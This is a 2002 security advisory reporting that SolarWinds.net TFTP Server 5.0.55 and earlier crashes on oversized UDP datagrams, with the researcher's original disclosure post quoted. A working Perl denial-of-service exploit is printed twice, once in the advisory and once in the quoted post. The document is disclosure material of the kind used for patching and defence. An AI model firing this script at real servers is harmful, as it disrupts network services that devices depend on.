SolarWinds.net TFTP Server Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1005477 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 24 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 5.0.55 and prior versions
|
Description: A denial of service vulnerability was reported in SolarWinds.net's TFTP Server 2002 Standard Edition. A remote user can crash the service.
A remote user can reportedly send a large UDP datagram (8193 bytes or larger) to the server to cause the TFTP Server to crash.
A
demonstration exploit is provided:
#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port
= "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf)
or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";
#EOF
|
Impact: A remote user can cause the service to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: solarwinds.net/Tools/Free_tools/TFTP_Server/index.htm (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: D4rkGr3y <grey_1999@mail.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 24 Oct 2002 20:14:03 +0400
From: D4rkGr3y <grey_1999@mail.ru>
Subject: TFTP Server DoS
|
#############################################
#Product: TFTP Server 2002 Standard Edition #
#Authors: SolarWinds [www.SolarWinds.net] #
#Vulnerable versions: v.5.0.55 and bellow #
#Vulnerability: buffer overflow #
#Bug&exploit by D4rkGr3y [www.dhgroup.org] #
#############################################
#Overview#--------------------------------------------------------------#
From TFTP Server help:
"Many network devices require a TFTP Server to load their initial
operating system or configuration. Many routers, switches, hubs,
X-terminals, printers, terminal servers, etc need a TFTP server
in order to load their initial configuration".
#Description#------------------------------------------------------------#
First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and
FTP are different protocols - it's very important! TFTP uses UDP protocol
for it's work and it doesn't support some FTP's stuff. Directory travel
for example. U can use TFTP for file transfer only. Read RFC 1350 for
more details.
#Bug#--------------------------------------------------------------------#
It's possible to crash TFTP server using UDP datagram with a large size
(8193b and above). Vulnerable application on remote host will be closed
with error message:
Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.
#Exploit#----------------------------------------------------------------#
#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n"
;
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";
#EOF
Best regards www.dhgroup.org
D4rkGr3y icq 540981
|
|
